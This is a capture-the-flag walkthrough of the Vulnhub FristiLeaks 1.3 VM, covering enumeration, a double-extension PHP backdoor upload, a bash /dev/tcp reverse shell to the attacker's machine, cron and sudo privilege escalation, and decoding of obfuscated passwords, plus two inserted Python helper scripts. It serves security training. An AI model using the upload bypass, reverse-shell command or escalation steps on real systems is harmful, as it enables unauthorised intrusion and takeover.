Vulnhub - FristiLeaks #1.3 Writeup


Description:

Vulnhub - FristiLeaks #1.3: a small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc.

Enumeration

Starting off with nmap after adding fristileaks.com to the hosts file.

Nmap

Nmap scan report for fristileaks.com (192.168.29.5)
Host is up, received arp-response (0.00067s latency).
Scanned at 2020-02-16 00:30:56 EST for 12s
Not shown: 999 filtered ports
Reason: 990 no-responses and 9 host-prohibiteds
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:4A:3B:0D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 16 00:31:08 2020 -- 1 IP address (1 host up) scanned in 14.25 seconds

So all we have is a web server on port 80: Apache 2.2.15 with PHP 5.3.3, the stock CentOS 6 packages. Checking out the URLs in robots.txt (/cola, /sisi, /beer) just returns an image stating that we are looking at the wrong URL. Other enumeration methods turned up empty or useless results.
I was banging my head against the wall looking for any possible attack avenue. In the end I had to go online to look for some hints. Turns out that there is a directory named fristi. How the hell was I supposed to find that? Man, I hate this kind of CTF challenge. So anyway, let's see what's in there.

image1

We are greeted with a login page. I tried some SQL injection, but it doesn't seem to be vulnerable. Let's check if there is anything interesting in the source code.

<html>
<head>
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->
</head>
<body>
<center><h1> Welcome to #fristileaks admin portal</h1></center>
<center><img src="data:img/png;base64,/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3k
AAQAEAAAAZAAA/+4ADkFkb2JlAGTAAAAAAf/bAIQAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQICAgICAgICAgICAwMDAwMDAwMDAwEBAQEBAQECAQECAgIBAgIDAwMDA

------output snipped----------
    
<!-- 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
    
------output snipped----------

We have a comment signed by user eezeepz and two images encoded in base64 (I didn't know you could do that). The second one is commented out. Note that the declared type is not to be trusted: the first blob starts with /9j/, which decodes to the JPEG signature FF D8 FF even though the data URI says img/png, while the commented-out blob starts with iVBORw0KGgo, the base64 form of the PNG signature 89 50 4E 47. We can use a base64 to PNG converter, or simply decode the bytes ourselves, to check the contents.
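The following Python script is an added example, not code from the original write-up: it automates what the base64-to-PNG converter did, pulling every base64 blob out of data: URIs and out of HTML comments, and identifying each by its magic bytes instead of the declared MIME type. SAMPLE_HTML is constructed here with short stub images that mimic the page's source (a JPEG labelled img/png, and a PNG hidden in a comment); the real blobs are the ones quoted above.

```python
import base64
import re

# Content signatures for the formats seen on the page. The MIME type in a
# data: URI is whatever the author typed, so the bytes decide, not the label.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

DATA_URI_RE = re.compile(r"data:([\w/+.-]+);base64,([A-Za-z0-9+/=\s]+)")
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def sniff(data: bytes) -> str:
    """Identify an image by its leading bytes, or return 'unknown'."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def extract_images(html: str):
    """Return (where, declared_mime, sniffed_kind, raw_bytes) for every
    base64 image found in a data: URI or sitting alone inside an HTML comment."""
    found = []
    for mime, blob in DATA_URI_RE.findall(html):
        raw = base64.b64decode(re.sub(r"\s+", "", blob))
        found.append(("data-uri", mime, sniff(raw), raw))
    for body in COMMENT_RE.findall(html):
        compact = re.sub(r"\s+", "", body)
        # Only treat a comment as an image when the whole body is base64;
        # the eezeepz TODO comment contains ':' and '.' and is skipped.
        if len(compact) < 16 or not B64_RE.fullmatch(compact):
            continue
        raw = base64.b64decode(compact)
        found.append(("comment", None, sniff(raw), raw))
    return found


def _wrap(data: bytes, width: int = 76) -> str:
    """Base64-encode and wrap like the page's source does."""
    text = base64.b64encode(data).decode()
    return "\n".join(text[i:i + width] for i in range(0, len(text), width))


# Constructed stand-ins for the page's two blobs: a JFIF header labelled
# img/png (as on the real page) and a PNG header inside a comment.
_JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 40
_PNG_STUB = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 40

SAMPLE_HTML = f"""<html><head>
<!-- TODO: clean this up for production. - by eezeepz -->
</head><body>
<img src="data:img/png;base64,{_wrap(_JPEG_STUB)}">
<!--
{_wrap(_PNG_STUB)}
-->
</body></html>"""

if __name__ == "__main__":
    for where, mime, kind, raw in extract_images(SAMPLE_HTML):
        print(f"{where}: declared={mime} sniffed={kind} size={len(raw)} bytes")
```

To recover the hidden image from the real page, feed the saved HTML to extract_images and write the raw bytes of the "comment" entry to a file with the sniffed extension.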

image1

We are presented with a string, keKkeKKeKKeKkEkkEk, which is probably the password for eezeepz. Log in to the admin portal as eezeepz with that password.

image1

We are greeted with a file upload page that only allows png, jpg and gif. After trying out various payloads, I found the following:

  1. The file name has to end with .png to be uploaded.
  2. The magic bytes of the file are irrelevant; only the name suffix is checked.

In other words the filter looks at the extension, not at the content, and a double extension is enough: most likely Apache's mod_php handler applies to any file that has .php among its extensions, so s.php.png is still executed as PHP. I used the simple PHP backdoor that ships with Kali at /usr/share/webshells/php/simple-backdoor.php, renamed it s.php.png and uploaded it. It is then reachable at http://fristileaks.com/fristi/uploads/s.php.png? with the command passed in the cmd query parameter.

image1

Low Shell

Run the following command through the PHP backdoor to get a bash reverse shell. The URL-encoded cmd parameter decodes to bash -i >& /dev/tcp/192.168.29.3/4444 0>&1, where 192.168.29.3 is the attacking machine:

fristileaks.com/fristi/uploads/s.php.png?cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.29.3%2F4444%200%3E%261

Start nc on the attacking machine before requesting that URL, and wait for the connection.

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.29.3] from fristileaks.com [192.168.29.5] 43601
bash: no job control in this shell
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)

Low Shell Enum

There are some interesting files in the home directory /home/eezeepz.

bash-4.1$ cat notes.txt 
cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Looks like a note from a user with higher privileges, presumably admin. A cron job runs every line of /tmp/runthis as admin, as long as each command is given by full path and lives either under /usr/bin/ or among the copies in admin's home directory: chmod, df, cat, echo, ps, grep and egrep. Allowing chmod in a runner that executes as another user is the mistake: we can make admin open up the permissions on its own home directory and then read whatever is in there.

bash-4.1$ echo "/home/admin/chmod 777 /home/admin" > runthis
echo "/home/admin/chmod 777 /home/admin" > runthis
bash-4.1$ ls  
ls
1
cronresult
runthis
bash-4.1$ cat cronresult
cat cronresult
/usr/binexecuting: /home/admin/chmod 777 /home/admin/
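The real cronjob.py is in admin's home directory but its contents are not shown on the page, so the Python below is an added, hypothetical reconstruction of the rule Jerry's note describes (full path required, only /usr/bin/* or /home/admin/*), placed next to the check a privileged command runner actually needs. RUNTHIS is a constructed file: the line used above plus the variants an attacker would try next. The set of "safe" binaries is an assumption made for the example.

```python
import os
import shlex

# Hypothetical model of the note's rule: first token must start with one of
# these prefixes. Not the VM's cronjob.py, which the write-up does not show.
ALLOWED_PREFIXES = ("/usr/bin/", "/home/admin/")


def naive_allowed(line: str) -> bool:
    """Prefix check on the first token, which is all the note promises."""
    argv = shlex.split(line)
    return bool(argv) and argv[0].startswith(ALLOWED_PREFIXES)


# What a runner executing as another user needs instead: normalise the path
# so '..' cannot escape the prefix, match against an explicit set of
# binaries, and keep out anything that changes permissions, reads or writes
# arbitrary files, or interprets code (chmod, cat, shells, python, env ...).
# This set is an assumption for the example.
SAFE_BINARIES = frozenset({
    "/home/admin/df",
    "/home/admin/ps",
})


def hardened_allowed(line: str) -> bool:
    """Normalised exact-match allowlist, no absolute-path arguments."""
    argv = shlex.split(line)
    if not argv:
        return False
    binary = os.path.normpath(argv[0])  # /usr/bin/../../bin/bash -> /bin/bash
    if binary not in SAFE_BINARIES:
        return False
    # Refuse absolute-path arguments so the tool cannot be pointed at
    # arbitrary files; df/ps with plain option flags still work.
    return all(not arg.startswith("/") for arg in argv[1:])


def check_runthis(text: str):
    """Evaluate each non-empty line of a runthis file under both policies.
    Returns (line, naive_verdict, hardened_verdict) tuples."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            rows.append((line, naive_allowed(line), hardened_allowed(line)))
    return rows


# Constructed runthis contents.
RUNTHIS = """\
/home/admin/chmod 777 /home/admin
/usr/bin/../../bin/bash -c id
/usr/bin/python -c "import os; os.system('id')"
/home/admin/df -h
"""

if __name__ == "__main__":
    for line, naive, hard in check_runthis(RUNTHIS):
        print(f"naive={naive!s:5} hardened={hard!s:5}  {line}")
```

Under the note's rule every line passes, including a path-traversal to /bin/bash and a python one-liner, which makes the chmod copy merely the most convenient primitive; the VM does have python (it is used below to spawn a pty), and on CentOS it lives in /usr/bin, so the /usr/bin/* allowance alone would presumably be enough for arbitrary execution as admin.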

After waiting for the cron job to fire (it runs every minute), check the permissions on admin's home directory.

bash-4.1$ cd /home
cd /home
bash-4.1$ ls -la
ls -la
total 32
drwxr-xr-x.  6 root      root       4096 Feb 16 00:06 .
dr-xr-xr-x. 22 root      root       4096 Feb 15 23:53 ..
drwxrwxrwx.  2 admin     admin      4096 Nov 19  2015 admin
drwx---r-x.  5 eezeepz   eezeepz   12288 Nov 18  2015 eezeepz
drwx------   2 fristigod fristigod  4096 Nov 19  2015 fristigod

Listing the admin directory gives us a few interesting files.

bash-4.1$ ls -la
ls -la
total 652
drwxrwxrwx. 2 admin     admin       4096 Nov 19  2015 .
drwxr-xr-x. 6 root      root        4096 Feb 16 00:06 ..
-rw-r--r--. 1 admin     admin         18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 admin     admin        176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 admin     admin        124 Sep 22  2015 .bashrc
-rwxr-xr-x  1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x  1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r--  1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r--  1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r--  1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x  1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x  1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 grep
-rwxr-xr-x  1 admin     admin      85304 Nov 18  2015 ps
-rw-r--r--  1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt
bash-4.1$ 
  1. A file owned by fristigod, whoisyourgodnow.txt, containing what looks like reversed base64 text (the leading = is padding that belongs at the end). Probably the password for fristigod:
    bash-4.1$ cat whoisyourgodnow.txt
    cat whoisyourgodnow.txt
    =RFn0AKnlMHMPIzpyuTI0ITG
    
  2. A file named cryptedpass.txt, owned by admin, that again contains base64-looking text:
    cat cryptedpass.txt
    mVGZ3O3omkJLmy2pcuTq
    
  3. A Python script named cryptpass.py, presumably the one used to produce both:
    bash-4.1$ cat cryptpass.py
    cat cryptpass.py
    #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
    import base64,codecs,sys
    def encodeString(str):
     base64string= base64.b64encode(str)
     return codecs.encode(base64string[::-1], 'rot13')
    cryptoResult=encodeString(sys.argv[1])
    print cryptoResult
    

So it looks like this Python script was used to transform the passwords of admin and fristigod: base64-encode, reverse the string, then rot13. That is encoding, not encryption; there is no key, so anyone who can read the script can undo it by running the steps in reverse: rot13 (which is its own inverse), reverse the string, then base64-decode.

Python Decode Script

PS C:\> python
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> import codecs
>>> def decode(str):
...     rotstr = codecs.decode(str, 'rot13')[::-1]
...     return base64.b64decode(rotstr)
...
>>> decode("mVGZ3O3omkJLmy2pcuTq")
b'thisisalsopw123'
>>> decode("=RFn0AKnlMHMPIzpyuTI0ITG")
b'LetThereBeFristi!'

Decoded, cryptedpass.txt gives thisisalsopw123 (admin's file) and whoisyourgodnow.txt gives LetThereBeFristi! (fristigod's). Spawn a pty first, since su will not read a password without a terminal, then switch to fristigod.

bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Root Shell

After poking around, I found a directory /var/fristigod/.secret_admin_stuff

bash-4.1$ pwd
pwd
/var/fristigod
bash-4.1$ ls -la
ls -la
total 16
drwxr-x---   3 fristigod fristigod 4096 Nov 25  2015 .
drwxr-xr-x. 19 root      root      4096 Nov 19  2015 ..
-rw-------   1 fristigod fristigod 1780 Feb 16 00:09 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff

The .bash_history contains the following:

bash-4.1$ cat .bash*
cat .bash*
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

The history shows fristigod repeatedly running doCom through sudo -u fristi, so that is the sudo rule (sudo -l would confirm it). The binary in turn executes whatever command it is given with uid 0, as the id output below shows, so doCom is effectively a root command runner. Let's pop a shell with it.

bash-4.1$ ls
ls
doCom
bash-4.1$ sudo -u fristi ./doCom id
sudo -u fristi ./doCom id
[sudo] password for fristigod: LetThereBeFristi!

uid=0(root) gid=100(users) groups=100(users),502(fristigod)


sudo -u fristi ./doCom /bin/sh
sh-4.1# ud
ud
sh: ud: command not found
sh-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
sh-4.1# cd /root
cd /root
sh-4.1# ls
ls
1  fristileaks_secrets.txt
sh-4.1# cat fris*
cat fris*
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1


sh-4.1# 

And we are root!
